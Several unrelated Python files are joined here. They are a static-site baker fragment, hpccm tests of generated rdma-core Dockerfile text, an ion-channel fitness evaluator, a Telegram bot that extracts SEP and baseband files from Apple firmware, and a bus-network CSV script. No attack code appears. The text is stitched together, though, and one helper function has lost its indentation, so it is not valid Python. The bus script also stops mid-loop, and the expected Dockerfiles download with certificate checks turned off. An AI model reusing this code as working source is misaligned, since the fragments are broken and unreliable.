        source_name, item_spec = job['job_spec']

        # Make the pipeline do custom handling to update the record entry.
        ppinfo = userdata.ppmngr.getPipelineInfo(source_name)
        pipeline = ppinfo.pipeline
        record = ppinfo.current_record
        ppmrctx = PipelineJobResultHandleContext(record, job, cur_pass)
        pipeline.handleJobResult(res, ppmrctx)

        # Set the overall success flags if there was an error.
        record_entry = ppmrctx.record_entry
        if not record_entry.success:
            record.success = False
            userdata.records.success = False
            self._logErrors(job['item_spec'], record_entry.errors)

    def _handleWorkerError(self, job, exc_data, userdata):
        """Pool callback: record and log a job that died with an exception."""
        # Set the overall success flag.
        source_name, item_spec = job['job_spec']
        ppinfo = userdata.ppmngr.getPipelineInfo(source_name)
        pipeline = ppinfo.pipeline
        record = ppinfo.current_record
        record.success = False
        userdata.records.success = False

        # Add those errors to the record, if possible.
        record_entry_spec = job.get('record_entry_spec', item_spec)
        e = record.getEntry(record_entry_spec)
        if not e:
            e = pipeline.createRecordEntry(item_spec)
            record.addEntry(e)
        e.errors.append(exc_data['value'])
        self._logWorkerException(item_spec, exc_data)

        # Log debug stuff.
        if self.app.debug:
            logger.error(exc_data['traceback'])
class _PoolUserData:
    # Shared state handed to the worker-pool callbacks of one bake run.
    def __init__(self, baker, ppmngr):
        self.baker = baker
        self.ppmngr = ppmngr
        # Current (in-progress) records of this bake's history.
        self.records = ppmngr.record_histories.current
        # Pipeline pass currently executing; updated by Baker._bakeRealm.
        self.cur_pass = 0
def _get_pipeline_infos_by_pass_and_realm(pp_infos):
    """Group pipeline infos into a {pass_num: {realm: [infos]}} mapping.

    A pipeline whose PASS_NUM is a list is registered once per listed pass.
    """
    grouped = {}
    for info in pp_infos:
        pass_num = info.pipeline.PASS_NUM
        passes = pass_num if isinstance(pass_num, list) else [pass_num]
        for ppn in passes:
            _add_pipeline_info_to_pass_and_realm_dict(ppn, info, grouped)
    return grouped
def _add_pipeline_info_to_pass_and_realm_dict(pp_pass_num, pp_info,
pp_by_pass_and_realm):
pp_by_realm = pp_by_pass_and_realm.setdefault(pp_pass_num, {})
pplist = pp_by_realm.setdefault(
pp_info.pipeline.source.config['realm'], [])
pplist.append(pp_info)
def _merge_execution_stats(base_stats, *other_stats):
    """Fold the main-process and worker stats into one fresh ExecutionStats.

    None entries in other_stats (workers that reported nothing) are skipped.
    """
    merged = ExecutionStats()
    merged.mergeStats(base_stats)
    for stats in other_stats:
        if stats is None:
            continue
        merged.mergeStats(stats)
    return merged
def _save_bake_records(records, records_path, *, rotate_previous):
    """Save bake records to disk, optionally rotating older copies.

    Rotation shifts existing backups up one slot (``id.records`` ->
    ``id.1.records`` -> ... -> ``id.9.records``), dropping the oldest.
    """
    if rotate_previous:
        records_dir, records_fn = os.path.split(records_path)
        records_id, _ = os.path.splitext(records_fn)
        # Walk backups from oldest to newest so each rename has a free slot.
        for i in reversed(range(9)):
            suffix = '.%d' % i if i else ''
            current = os.path.join(
                records_dir,
                '%s%s.records' % (records_id, suffix))
            if not os.path.exists(current):
                continue
            successor = os.path.join(
                records_dir,
                '%s.%s.records' % (records_id, i + 1))
            if os.path.exists(successor):
                os.remove(successor)
            os.rename(current, successor)

    with format_timed_scope(logger, "saved bake records.",
                            level=logging.DEBUG, colored=False):
        records.save(records_path)
|
<reponame>robertmaynard/hpc-container-maker
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=invalid-name, too-few-public-methods, bad-continuation
"""Test cases for the rdma_core module"""
from __future__ import unicode_literals
from __future__ import print_function
import logging # pylint: disable=unused-import
import unittest
from helpers import centos, docker, ubuntu, x86_64
from hpccm.building_blocks.rdma_core import rdma_core
class Test_rdma_core(unittest.TestCase):
    # Each test compares the generated container instructions against the
    # exact expected Dockerfile text for one distro / option combination.
    def setUp(self):
        """Disable logging output messages"""
        logging.disable(logging.ERROR)

    @x86_64
    @ubuntu
    @docker
    def test_defaults_ubuntu(self):
        """Default rdma_core building block"""
        r = rdma_core()
        self.assertEqual(str(r),
r'''# RDMA Core version 31.2
RUN apt-get update -y && \
    DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
        libnl-3-dev \
        libnl-route-3-dev \
        libudev-dev \
        make \
        pandoc \
        pkg-config \
        python3-docutils \
        wget && \
    rm -rf /var/lib/apt/lists/*
RUN mkdir -p /var/tmp && wget -q -nc --no-check-certificate -P /var/tmp https://github.com/linux-rdma/rdma-core/archive/v31.2.tar.gz && \
    mkdir -p /var/tmp && tar -x -f /var/tmp/v31.2.tar.gz -C /var/tmp -z && \
    mkdir -p /var/tmp/rdma-core-31.2/build && cd /var/tmp/rdma-core-31.2/build && cmake -DCMAKE_INSTALL_PREFIX=/usr/local/rdma-core /var/tmp/rdma-core-31.2 && \
    cmake --build /var/tmp/rdma-core-31.2/build --target all -- -j$(nproc) && \
    cmake --build /var/tmp/rdma-core-31.2/build --target install -- -j$(nproc) && \
    rm -rf /var/tmp/rdma-core-31.2 /var/tmp/v31.2.tar.gz
ENV CPATH=/usr/local/rdma-core/include:$CPATH \
    LD_LIBRARY_PATH=/usr/local/rdma-core/lib:/usr/local/rdma-core/lib64:$LD_LIBRARY_PATH \
    LIBRARY_PATH=/usr/local/rdma-core/lib:/usr/local/rdma-core/lib64:$LIBRARY_PATH \
    PATH=/usr/local/rdma-core/bin:$PATH''')

    @x86_64
    @centos
    @docker
    def test_defaults_centos(self):
        """Default rdma_core building block"""
        r = rdma_core()
        self.assertEqual(str(r),
r'''# RDMA Core version 31.2
RUN yum install -y epel-release && \
    yum install -y \
        libnl3-devel \
        libudev-devel \
        make \
        pandoc \
        pkgconfig \
        python-docutils \
        wget && \
    rm -rf /var/cache/yum/*
RUN mkdir -p /var/tmp && wget -q -nc --no-check-certificate -P /var/tmp https://github.com/linux-rdma/rdma-core/archive/v31.2.tar.gz && \
    mkdir -p /var/tmp && tar -x -f /var/tmp/v31.2.tar.gz -C /var/tmp -z && \
    mkdir -p /var/tmp/rdma-core-31.2/build && cd /var/tmp/rdma-core-31.2/build && cmake -DCMAKE_INSTALL_PREFIX=/usr/local/rdma-core /var/tmp/rdma-core-31.2 && \
    cmake --build /var/tmp/rdma-core-31.2/build --target all -- -j$(nproc) && \
    cmake --build /var/tmp/rdma-core-31.2/build --target install -- -j$(nproc) && \
    rm -rf /var/tmp/rdma-core-31.2 /var/tmp/v31.2.tar.gz
ENV CPATH=/usr/local/rdma-core/include:$CPATH \
    LD_LIBRARY_PATH=/usr/local/rdma-core/lib:/usr/local/rdma-core/lib64:$LD_LIBRARY_PATH \
    LIBRARY_PATH=/usr/local/rdma-core/lib:/usr/local/rdma-core/lib64:$LIBRARY_PATH \
    PATH=/usr/local/rdma-core/bin:$PATH''')

    @x86_64
    @ubuntu
    @docker
    def test_ldconfig(self):
        """ldconfig option"""
        # With ldconfig=True the library dir goes into ld.so.conf instead of
        # LD_LIBRARY_PATH.
        r = rdma_core(ldconfig=True, version='31.2')
        self.assertEqual(str(r),
r'''# RDMA Core version 31.2
RUN apt-get update -y && \
    DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
        libnl-3-dev \
        libnl-route-3-dev \
        libudev-dev \
        make \
        pandoc \
        pkg-config \
        python3-docutils \
        wget && \
    rm -rf /var/lib/apt/lists/*
RUN mkdir -p /var/tmp && wget -q -nc --no-check-certificate -P /var/tmp https://github.com/linux-rdma/rdma-core/archive/v31.2.tar.gz && \
    mkdir -p /var/tmp && tar -x -f /var/tmp/v31.2.tar.gz -C /var/tmp -z && \
    mkdir -p /var/tmp/rdma-core-31.2/build && cd /var/tmp/rdma-core-31.2/build && cmake -DCMAKE_INSTALL_PREFIX=/usr/local/rdma-core /var/tmp/rdma-core-31.2 && \
    cmake --build /var/tmp/rdma-core-31.2/build --target all -- -j$(nproc) && \
    cmake --build /var/tmp/rdma-core-31.2/build --target install -- -j$(nproc) && \
    echo "/usr/local/rdma-core/lib" >> /etc/ld.so.conf.d/hpccm.conf && ldconfig && \
    rm -rf /var/tmp/rdma-core-31.2 /var/tmp/v31.2.tar.gz
ENV CPATH=/usr/local/rdma-core/include:$CPATH \
    LIBRARY_PATH=/usr/local/rdma-core/lib:/usr/local/rdma-core/lib64:$LIBRARY_PATH \
    PATH=/usr/local/rdma-core/bin:$PATH''')

    @x86_64
    @ubuntu
    @docker
    def test_git_repository_true(self):
        """repository=True clones the git repo instead of downloading a tarball"""
        r = rdma_core(repository=True)
        self.assertEqual(str(r),
r'''# RDMA Core https://github.com/linux-rdma/rdma-core.git
RUN apt-get update -y && \
    DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
        ca-certificates \
        git \
        libnl-3-dev \
        libnl-route-3-dev \
        libudev-dev \
        make \
        pandoc \
        pkg-config \
        python3-docutils \
        wget && \
    rm -rf /var/lib/apt/lists/*
RUN mkdir -p /var/tmp && cd /var/tmp && git clone --depth=1 https://github.com/linux-rdma/rdma-core.git rdma-core && cd - && \
    mkdir -p /var/tmp/rdma-core/build && cd /var/tmp/rdma-core/build && cmake -DCMAKE_INSTALL_PREFIX=/usr/local/rdma-core /var/tmp/rdma-core && \
    cmake --build /var/tmp/rdma-core/build --target all -- -j$(nproc) && \
    cmake --build /var/tmp/rdma-core/build --target install -- -j$(nproc) && \
    rm -rf /var/tmp/rdma-core
ENV CPATH=/usr/local/rdma-core/include:$CPATH \
    LD_LIBRARY_PATH=/usr/local/rdma-core/lib:/usr/local/rdma-core/lib64:$LD_LIBRARY_PATH \
    LIBRARY_PATH=/usr/local/rdma-core/lib:/usr/local/rdma-core/lib64:$LIBRARY_PATH \
    PATH=/usr/local/rdma-core/bin:$PATH''')

    @ubuntu
    @docker
    def test_runtime(self):
        """Runtime"""
        # runtime() copies the installed tree from the build stage and only
        # installs the shared-library runtime packages.
        r = rdma_core()
        r2 = r.runtime()
        self.assertEqual(r2,
r'''# RDMA Core
RUN apt-get update -y && \
    DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
        libnl-3-200 \
        libnl-route-3-200 \
        libnuma1 && \
    rm -rf /var/lib/apt/lists/*
COPY --from=0 /usr/local/rdma-core /usr/local/rdma-core
ENV CPATH=/usr/local/rdma-core/include:$CPATH \
    LD_LIBRARY_PATH=/usr/local/rdma-core/lib:/usr/local/rdma-core/lib64:$LD_LIBRARY_PATH \
    LIBRARY_PATH=/usr/local/rdma-core/lib:/usr/local/rdma-core/lib64:$LIBRARY_PATH \
    PATH=/usr/local/rdma-core/bin:$PATH''')
|
import numpy as np
from cwFitter import Simulator
class Evaluator(object):
    """Scores candidate ion-channel parameter sets against sample data.

    For each candidate, VClamp and/or IClamp simulations are run and the
    squared error against the experimental traces (and optionally the I/V
    curve) is folded into a fitness value. The approach follows
    Gurkiewicz & Korngreen (doi:10.1371/journal.pcbi.0030169).
    """

    def __init__(self, sampleData, sim_params, bio_params):
        """
        sampleData: dict of experimental data keyed by 'VClamp'/'IClamp'/'IV'.
        sim_params: simulation/protocol parameters.
        bio_params: channel parameter names plus fixed cell parameter values.
        """
        self.sampleData = sampleData
        self.sim_params = sim_params
        self.bio_params = bio_params
        # Bug fix: the original tested the misspelled key 'protoco_start_I',
        # so the current-clamp protocol range was silently never used.
        if 'protocol_start_I' in sim_params:
            self.steps = np.arange(sim_params['protocol_start_I'], sim_params['protocol_end_I'], sim_params['protocol_steps_I'])
        else:
            self.steps = np.arange(sim_params['protocol_start'], sim_params['protocol_end'], sim_params['protocol_steps'])

    def evaluate(self, candidates, args):
        """
        Runs VClamp and/or IClamp simulation to calculate the cost value for each candidate.
        I/V curve is also considered as an evaluation factor and coming from VClamp or IClamp simulations.
        The approach is based on Gurkiewicz & Korngreen study (doi:10.1371/journal.pcbi.0030169.)
        :return: list of fitness values, one per candidate
        """
        #TODO: Include weights and minimization function (e.g. prAxis)
        #Based on Gurkiewicz & Korngreen approach (doi:10.1371/journal.pcbi.0030169.)
        total_fitness = []
        for candidate in candidates:
            # Bug fix: the cost accumulators were initialized once outside the
            # candidate loop, so every candidate's cost leaked into the next.
            Vcost = 0
            Icost = 0
            IVcost = 0
            IVFlag = False
            samples = 0
            cand_var = dict(zip(self.bio_params['channel_params'], candidate))
            cell_var = dict(zip(self.bio_params['cell_params'], self.bio_params['val_cell_params']))
            mySimulator = Simulator.Simulator(self.sim_params, cand_var, cell_var)
            # Run a voltage clamp when VClamp data exists, or when only an
            # I/V curve is available (no clamp traces at all).
            if ('VClamp' in self.sampleData) or (
                    ('IV' in self.sampleData) and
                    ('VClamp' not in self.sampleData) and
                    ('IClamp' not in self.sampleData)):
                VClampSim_t, VClampSim_I, VClampSim_Vmax, VClampSim_Imax = mySimulator.VClamp()
                if 'VClamp' in self.sampleData:
                    N_total = 0
                    M = 0
                    for trace in self.sampleData['VClamp']['traces']:
                        # Map the trace's holding voltage onto the protocol step index.
                        index = int((trace['vol'] - self.sim_params['protocol_start']) / self.sim_params['protocol_steps'])
                        if VClampSim_I[index]:
                            tempCost, N = self.cost([VClampSim_t, VClampSim_I[index]], [trace['t'], trace['I']])
                            Vcost += tempCost
                            # Bug fix: the original did "N += N", doubling the
                            # last trace's point count instead of summing all.
                            N_total += N
                            M += 1
                    if (N_total * M) != 0:
                        Vcost /= (N_total * M)
                        samples += 1
                if 'IV' in self.sampleData:
                    IVcost, N = self.cost([VClampSim_Vmax, VClampSim_Imax], [self.sampleData['IV']['V'], self.sampleData['IV']['I']])
                    if N != 0:
                        IVcost /= N
                        IVFlag = True
                        samples += 1
            if 'IClamp' in self.sampleData:
                IClampSim_t, IClampSim_v, IClampSim_Vmax, IClampSim_Imax = mySimulator.IClamp()
                N_total = 0
                M = 0
                for trace in self.sampleData['IClamp']['traces']:
                    index = int((trace['amp'] - self.sim_params['protocol_start_I']) / self.sim_params['protocol_steps_I'])
                    if IClampSim_v[index]:
                        tempCost, N = self.cost([IClampSim_t, IClampSim_v[index]], [trace['t'], trace['V']])
                        Icost += tempCost
                        N_total += N  # bug fix, same as above
                        M += 1
                if (N_total * M) != 0:
                    Icost /= (N_total * M)
                    samples += 1
                # Only derive the I/V cost from IClamp if VClamp didn't already.
                if IVFlag == False and 'IV' in self.sampleData:
                    IVcost, N = self.cost([IClampSim_Vmax, IClampSim_Imax], [self.sampleData['IV']['V'], self.sampleData['IV']['I']])
                    if N != 0:
                        IVcost /= N
                        IVFlag = True
                        samples += 1
            # Guard against ZeroDivisionError when no dataset contributed;
            # fall back to the original "very bad" sentinel fitness.
            if samples:
                fitness = (Vcost + Icost + IVcost) / samples
            else:
                fitness = 1e10
            total_fitness.append(fitness)
        return total_fitness

    def cost(self, sim, target):
        """
        Get simulation data and target data (experimental/digitazed) to calculate cost.
        Cost function calculation is based on Gurkiewicz & Korngreen approach (doi:10.1371/journal.pcbi.0030169.)
        sim: [x_values, y_values] from the simulation (x must be a list).
        target: [x_values, y_values] from the sample data.
        :return: (cost_value, N) where N is the number of compared points;
            cost_value stays at the 1e9 sentinel when nothing was comparable.
        """
        #TODO: a better way to calculate cost is to measure the area between two plots!!
        sim_x = sim[0]
        cost_val = 1e9
        N = 0
        for target_x in target[0]:
            # Nearest simulated x to this target x.
            index = sim_x.index(min(sim_x, key=lambda x: abs(x - target_x)))  #TODO: check if the distance is in a reasonable range (consider a sigma)
            if sim[1][index]:
                # NOTE(review): a simulated value of exactly 0 is skipped by
                # this truthiness test -- presumably it means "no data"; confirm.
                # First comparable point: switch from the 1e9 sentinel to 0.
                if cost_val == 1e9:
                    cost_val = 0
                sim_y = sim[1][index]
                target_y = target[1][target[0].index(target_x)]  #TODO: look for a better way to work with indices
                cost_val += (target_y - sim_y) ** 2  #TODO: normalize distance
                N += 1
        return cost_val, N
|
#!/usr/bin/env python3
import argparse
import html
import logging
import os
import plistlib
import subprocess
import tempfile
import time
import urllib.parse
import zipfile
from enum import Enum
from io import BytesIO
from pathlib import Path
import requests
import toml
from packaging import version
from telegram import ChatAction, InlineKeyboardButton, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove
from telegram.ext import CallbackQueryHandler, CommandHandler, Filters, MessageHandler, Updater
# Maps the human-readable keyboard button label to the device-identifier
# prefix used by the ipsw.me API (e.g. 'iPhone10,3' starts with 'iPhone').
DEVICE_TYPES = {
    'iPhone': 'iPhone',
    'iPad': 'iPad',
    'iPod touch': 'iPod',
    'Apple TV': 'AppleTV',
}
class State(Enum):
    """Conversation states for the step-by-step device/firmware picker."""
    NONE = 0
    DEVICE_TYPE = 1
    DEVICE_MODEL = 2
    BOARD_CONFIG = 3
    FIRMWARE = 4
def sepbb(update, ctx):
    """Entry command: reset all per-user state and ask for a device type."""
    type_keyboard = [
        ['iPhone', 'iPad'],
        ['iPod touch', 'Apple TV'],
    ]
    update.message.reply_text('Please select a device type.',
                              reply_markup=ReplyKeyboardMarkup(type_keyboard))
    ctx.user_data.clear()
    ctx.user_data['state'] = State.DEVICE_TYPE
def on_text(update, ctx):
    """Drive the device/board/firmware selection state machine from text input.

    Each branch validates the user's reply for the current State, stores the
    result in ctx.user_data and advances to the next state.
    """
    ctx.user_data.setdefault('state', State.NONE)
    text = update.message.text
    if ctx.user_data['state'] == State.DEVICE_TYPE:
        try:
            device_type = DEVICE_TYPES[text]
        except KeyError:
            return update.message.reply_text('Invalid input.')
        r = session.get('https://api.ipsw.me/v4/devices')
        if not r.ok:
            return update.message.reply_text('Unable to communicate with ipsw.me API, please try again later.')
        # Cache the full device list bot-wide; it is the same for every user.
        ctx.bot_data['devices'] = r.json()
        devices = [x for x in ctx.bot_data['devices'] if x['identifier'].startswith(device_type)]
        if not devices:
            return update.message.reply_text(
                'No devices found. Please start over using /start.', reply_markup=ReplyKeyboardRemove(),
            )
        # Two buttons per keyboard row.
        keyboard = []
        for i, device in enumerate(devices):
            if i % 2 == 0:
                keyboard.append([])
            keyboard[-1].append(device['name'])
        update.message.reply_text('Please select a device.', reply_markup=ReplyKeyboardMarkup(keyboard))
        ctx.user_data['state'] = State.DEVICE_MODEL
    elif ctx.user_data['state'] == State.DEVICE_MODEL:
        try:
            device = next(x for x in ctx.bot_data['devices'] if x['name'] == text)
        except StopIteration:
            return update.message.reply_text('Invalid input.')
        r = session.get(f'https://api.ipsw.me/v4/device/{device["identifier"]}')
        rb = session.get(f'https://api.m1sta.xyz/betas/{device["identifier"]}')
        if r.ok:
            device = r.json()
            # Bug fix: this flag was written to ctx.bot_data, but it is read
            # from ctx.user_data below -- a KeyError (or a stale value from a
            # previous run) whenever ipsw.me succeeded but the beta API failed.
            ctx.user_data['ipswme_failed'] = False
        else:
            # Keep a minimal device dict so beta firmwares can still be used.
            device = {
                'name': device['name'],
                'identifier': device['identifier'],
                'boards': device['boards'],
                'firmwares': [],
            }
            update.message.reply_text('Unable to communicate with ipsw.me API.')
            ctx.user_data['ipswme_failed'] = True
        if rb.ok:
            device_beta = rb.json()
            device['firmwares'] += device_beta
        else:
            update.message.reply_text('Unable to communicate with the beta API.')
            # Both APIs failed: there is nothing to offer the user.
            if ctx.user_data['ipswme_failed']:
                return update.message.reply_text('Please try again later.', reply_markup=ReplyKeyboardRemove())
        # Filter out DEV boards
        boards = [x['boardconfig'] for x in device['boards'] if x['boardconfig'].lower().endswith('ap')]
        if not boards:
            return update.message.reply_text('No boardconfigs found for this device.')
        ctx.user_data['device'] = device
        if len(boards) > 1:
            keyboard = []
            for i, board in enumerate(boards):
                if i % 2 == 0:
                    keyboard.append([])
                keyboard[-1].append(board)
            update.message.reply_text(
                'Please select your board config.\n\n'
                'You can get this using the System Info tweak or AIDA64 from the App Store.',
                reply_markup=ReplyKeyboardMarkup(keyboard),
            )
            ctx.user_data['state'] = State.BOARD_CONFIG
        else:
            # Only one board: skip the question and go straight to firmwares.
            ctx.user_data['boardconfig'] = boards[0]
            show_firmware_menu(update, ctx)
    elif ctx.user_data['state'] == State.BOARD_CONFIG:
        if not text.lower().endswith('ap'):
            return update.message.reply_text('Invalid input.')
        ctx.user_data['boardconfig'] = text
        show_firmware_menu(update, ctx)
    elif ctx.user_data['state'] == State.FIRMWARE:
        if 'device' not in ctx.user_data or 'boardconfig' not in ctx.user_data:
            return update.message.reply_text(
                'Invalid state. Please start over using /start.', reply_markup=ReplyKeyboardRemove()
            )
        try:
            firmware = ctx.user_data['firmware'] = next(
                x for x in ctx.user_data['device']['firmwares'] if x['version'] == text
            )
        except StopIteration:
            return update.message.reply_text('Invalid input.')
        p = urllib.parse.urlparse(firmware['url'])
        if p.netloc == 'appldnld.apple.com':
            # appldnld hosts no sibling BuildManifest.plist; pull it out of the IPSW.
            ctx.user_data['buildmanifest'] = pzb(update, ctx, firmware, 'BuildManifest.plist', 'BuildManifest')
        else:
            # Try the BuildManifest.plist that usually sits next to the IPSW.
            buildmanifest_url = urllib.parse.urlunparse(
                p._replace(path='/'.join([*p.path.split('/')[:-1], 'BuildManifest.plist']))
            )
            r = session.get(buildmanifest_url)
            if r.ok:
                ctx.user_data['buildmanifest'] = r.content
            else:
                ctx.user_data['buildmanifest'] = pzb(
                    update, ctx, ctx.user_data['firmware'], 'BuildManifest.plist', 'BuildManifest'
                )
        try:
            buildmanifest = plistlib.loads(ctx.user_data['buildmanifest'])
        except Exception:
            update.message.reply_text('Unable to parse BuildManifest, please try again later.')
            raise
        try:
            # Pick the build identity matching the user's board config.
            buildidentity = next(
                x for x in buildmanifest['BuildIdentities']
                if x['Info']['DeviceClass'].lower() == ctx.user_data['boardconfig'].lower()
            )
            if 'RestoreSEP' in buildidentity['Manifest']:
                sep_path = ctx.user_data['sep_path'] = buildidentity['Manifest']['RestoreSEP']['Info']['Path']
            else:
                sep_path = ctx.user_data['sep_path'] = None
            if 'BasebandFirmware' in buildidentity['Manifest']:
                bb_path = ctx.user_data['bb_path'] = buildidentity['Manifest']['BasebandFirmware']['Info']['Path']
            else:
                bb_path = ctx.user_data['bb_path'] = None
        except Exception:
            update.message.reply_text('Unable to get data from BuildManifest, please try again later.')
            raise
        try:
            # Send-and-delete trick to dismiss the custom reply keyboard.
            update.message.reply_text(
                'Removing keyboard... (ignore this message)',
                reply_markup=ReplyKeyboardRemove(),
            ).delete()
        except Exception:
            pass
        update.message.reply_text(
            ('<b>{device} ({boardconfig}) - {firmware} ({buildid})</b>\n\n'
             '<b>SEP</b>: {sep_path}\n'
             '<b>Baseband</b>: {bb_path}').format(
                device=html.escape(ctx.user_data['device']['name']),
                boardconfig=html.escape(ctx.user_data['boardconfig']),
                firmware=html.escape(firmware['version']),
                buildid=html.escape(firmware['buildid']),
                sep_path=html.escape(str(sep_path)),
                bb_path=html.escape(str(bb_path)),
            ),
            parse_mode='html',
            reply_markup=InlineKeyboardMarkup([
                [
                    InlineKeyboardButton("Download", callback_data="download"),
                ],
            ]),
        )
    else:
        update.message.reply_text('Invalid state. Please start over using /start.', reply_markup=ReplyKeyboardRemove())
def on_callback_query(update, ctx):
    """Handle inline-keyboard button presses.

    Currently only the "download" action exists: bundle the cached
    BuildManifest plus the previously resolved SEP / baseband files into an
    in-memory zip and send it to the chat.
    """
    # BUGFIX: callback queries carry no `update.message`.  pzb() patches it,
    # but pzb() only runs when a SEP or baseband path exists, so without this
    # fallback `reply_document` would crash on AttributeError when both paths
    # are None.
    update.message = update.message or update.callback_query.message
    if update.callback_query.data == 'download':
        zf = BytesIO()
        zf.name = f'sepbb_{ctx.user_data["boardconfig"]}_{ctx.user_data["firmware"]["buildid"]}.zip'
        with zipfile.ZipFile(zf, 'w') as zfd:
            buildmanifest = ctx.user_data['buildmanifest']
            zfd.writestr('BuildManifest.plist', buildmanifest)
            if ctx.user_data['sep_path']:
                sep = pzb(update, ctx, ctx.user_data['firmware'], ctx.user_data['sep_path'], 'SEP')
                if sep:
                    zfd.writestr(ctx.user_data['sep_path'], sep)
            if ctx.user_data['bb_path']:
                baseband = pzb(update, ctx, ctx.user_data['firmware'], ctx.user_data['bb_path'], 'Baseband')
                if baseband:
                    zfd.writestr(ctx.user_data['bb_path'], baseband)
        zf.seek(0)
        update.message.reply_document(zf.read(), zf.name)
    # Always answer the query so the client stops showing its spinner.
    ctx.bot.answer_callback_query(update.callback_query.id)
def show_firmware_menu(update, ctx):
    """Present a reply keyboard of currently signed firmware versions."""
    if 'device' not in ctx.user_data:
        return update.message.reply_text(
            'Invalid state. Please start over using /start.', reply_markup=ReplyKeyboardRemove(),
        )
    signed = [fw for fw in ctx.user_data['device']['firmwares'] if fw.get('signed')]
    if not signed:
        return update.message.reply_text('No signed firmwares found for this device.')

    def sort_key(fw):
        # Strip spaces and append a '1' to beta/RC labels so they parse as
        # valid version strings.
        raw = fw['version'].replace(' ', '')
        if fw['version'].lower().endswith(('beta', 'rc')):
            raw += '1'
        return version.parse(raw)

    signed.sort(key=sort_key)
    # Two version buttons per keyboard row.
    keyboard = [[fw['version'] for fw in signed[i:i + 2]]
                for i in range(0, len(signed), 2)]
    update.message.reply_text(
        'Please select a version.\n(Only currently signed versions are shown.)',
        reply_markup=ReplyKeyboardMarkup(keyboard),
    )
    ctx.user_data['state'] = State.FIRMWARE
def pzb(update, ctx, firmware, file, name):
    """Extract a single file from a remote IPSW using the external `pzb` tool.

    :param firmware: Firmware dict; only ['url'] is used here.
    :param file: Path of the file inside the IPSW to extract.
    :param name: Human-readable name used in chat progress messages.
    :returns: The file's bytes, or None if extraction failed.
    """
    update.message = update.message or update.callback_query.message
    update.message.reply_text(f'Extracting {name}, please wait...')
    with tempfile.TemporaryDirectory() as d:
        # BUGFIX: run pzb with cwd=d instead of os.chdir().  The old chdir()
        # mutated process-global state and was never restored if anything in
        # the polling loop raised.
        p = subprocess.Popen(['pzb', firmware['url'], '-g', file], cwd=d)
        while p.poll() is None:
            # Keep the "typing" indicator alive while pzb downloads.
            ctx.bot.send_chat_action(chat_id=update.effective_message.chat_id, action=ChatAction.TYPING)
            time.sleep(1)
        f = Path(d) / Path(file).name
        if not f.exists():
            update.message.reply_text(
                f'Unable to extract {name} for the selected firmware, please try again later.'
            )
            return
        return f.read_bytes()
if __name__ == '__main__':
    # Command line: --debug switches on verbose logging.
    parser = argparse.ArgumentParser()
    parser.add_argument('--debug', action='store_true', help='enable debug logging')
    args = parser.parse_args()
    logging.basicConfig(
        format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
        level=logging.DEBUG if args.debug else logging.INFO,
    )
    # Bot token is read from config.toml in the working directory.
    config = toml.load('config.toml')
    updater = Updater(config['token'])
    dispatcher = updater.dispatcher
    # Module-level HTTP session, reused by the handlers above for direct
    # BuildManifest downloads.
    session = requests.Session()
    # /start, /sep and /sepbb all enter the same conversation flow.
    dispatcher.add_handler(CommandHandler('start', sepbb))
    dispatcher.add_handler(CommandHandler('sep', sepbb))
    dispatcher.add_handler(CommandHandler('sepbb', sepbb))
    # Free-text messages drive the state machine; inline-button presses go
    # to the callback-query handler.
    dispatcher.add_handler(MessageHandler(Filters.text, on_text))
    dispatcher.add_handler(CallbackQueryHandler(on_callback_query))
    updater.start_polling()
|
<filename>SiouxFallNet/BaseNet&PyProcess/process.py
"""
This code is created process the bus network data
"""
import pandas as pd
# Network dimensions: number of bus lines and the number of stop columns
# per line in BusSet.csv.
num_bus_line = 10
max_bus_stops = 11
class LinkClass:
    """A directed network link (tail -> head) with a travel cost."""

    def __init__(self, _a, _b, _t):
        # Tuple-unpack the three fields in one statement.
        self.tail, self.head, self.cost = _a, _b, _t
class ODClass:
    """An origin-destination pair together with its travel demand."""

    def __init__(self, _o, _d, _val):
        # Tuple-unpack the three fields in one statement.
        self.origin, self.dest, self.demand = _o, _d, _val
# Step 1: Read created bus set
# BusSet.csv holds one row per bus line with `max_bus_stops` columns.
# A value of 0 apparently marks "no stop" (see the zero-filtering in the
# reverse-direction loop of Step 2) -- TODO confirm.
bus_stops = []
df = pd.read_csv("BusSet.csv",header=None)
# NOTE(review): "all_bus_stos" looks like a typo for "all_bus_stops"; kept
# as-is because the name is referenced throughout the script.
all_bus_stos = []
for b in range(0,num_bus_line):
    stops = []
    for s in range(0,max_bus_stops):
        stops.append(df[s][b])
    bus_stops.append(stops)
    # Echo each line for manual inspection.
    print(bus_stops[-1])
# Step 2: Write Bus Stop
# Stops.txt gets one line per bus line: first the forward direction exactly
# as read, then each line reversed (with a line number prepended and zero
# entries dropped).
bus_num = 1
with open("Stops.txt","w") as f:
    # Forward direction: write the stop lists verbatim.
    for b in range(0, num_bus_line):
        # print("{0}".format(bus_num),end=' ',file = f)
        for s in range(0,len(bus_stops[b])-1):
            print("{0}".format(bus_stops[b][s]),end=' ',file=f)
        print("{0}".format(bus_stops[b][-1]),file=f)
        bus_num=bus_num+1
        all_bus_stos.append(bus_stops[b])
    # Reverse direction: iterate lines and their stops backwards.
    # NOTE(review): the inner range stops at index 1, so the first stop
    # (index 0) of each line is skipped in the reversed output -- confirm
    # whether that is intended.
    for b in range(num_bus_line,0,-1):
        # print("{0}".format(bus_num),end=' ',file = f)
        line = []
        line.append(bus_num)
        for s in range(len(bus_stops[b-1]),1,-1):
            if bus_stops[b-1][s-1]!=0:
                line.append(bus_stops[b-1][s-1])
        # Pad short lines with zeros.
        # NOTE(review): the `-1` here pads one entry fewer than
        # `max_bus_stops` -- TODO confirm the intended padded length.
        if len(line)<max_bus_stops:
            for i in range(0,max_bus_stops-len(line)-1):
                line.append(0)
        all_bus_stos.append(line)
        print(line)
        for s in range(0,len(line)-1):
